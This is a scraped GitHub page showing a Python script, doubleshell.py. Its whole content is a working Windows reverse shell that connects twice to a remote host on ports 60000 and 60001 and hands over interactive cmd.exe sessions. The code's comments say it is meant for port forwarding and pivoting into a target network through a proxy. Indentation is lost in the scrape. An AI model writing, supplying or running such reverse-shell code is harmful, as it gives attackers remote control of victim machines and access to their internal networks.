-
Notifications
You must be signed in to change notification settings - Fork 2
/
doubleshell.py
57 lines (56 loc) · 1.65 KB
/
doubleshell.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
#creates 2 shells on target
#one is used to setup a remore port forward using plink, which will kill the shell
#the other can be used to setup a socks proxy with powershell, to pivot into target network
import os,socket,subprocess,threading;
def ss2pp(ss, pp):
while True:
data = ss.recv(1024)
if len(data) > 0:
pp.stdin.write(data)
def pp2ss(ss, pp):
while True:
ss.send(pp.stdout.read(1))
ss=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
ss.connect(("10.0.0.0",60000))
pp=subprocess.Popen(["\\windows\\system32\\cmd.exe"], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE)
ss2pp_thread = threading.Thread(target=ss2pp, args=[ss, pp])
ss2pp_thread.daemon = True
ss2pp_thread.start()
pp2ss_thread = threading.Thread(target=pp2ss, args=[ss, pp])
pp2ss_thread.daemon = True
pp2ss_thread.start()
def s2p(s, p):
while True:
data = s.recv(1024)
if len(data) > 0:
p.stdin.write(data)
def p2s(s, p):
while True:
s.send(p.stdout.read(1))
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.0.0.0",60001))
p=subprocess.Popen(["\\windows\\system32\\cmd.exe"], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE)
s2p_thread = threading.Thread(target=s2p, args=[s, p])
s2p_thread.daemon = True
s2p_thread.start()
p2s_thread = threading.Thread(target=p2s, args=[s, p])
p2s_thread.daemon = True
p2s_thread.start()
try:
p.wait()
pp.wait()
except KeyboardInterrupt:
s.close()
ss.close()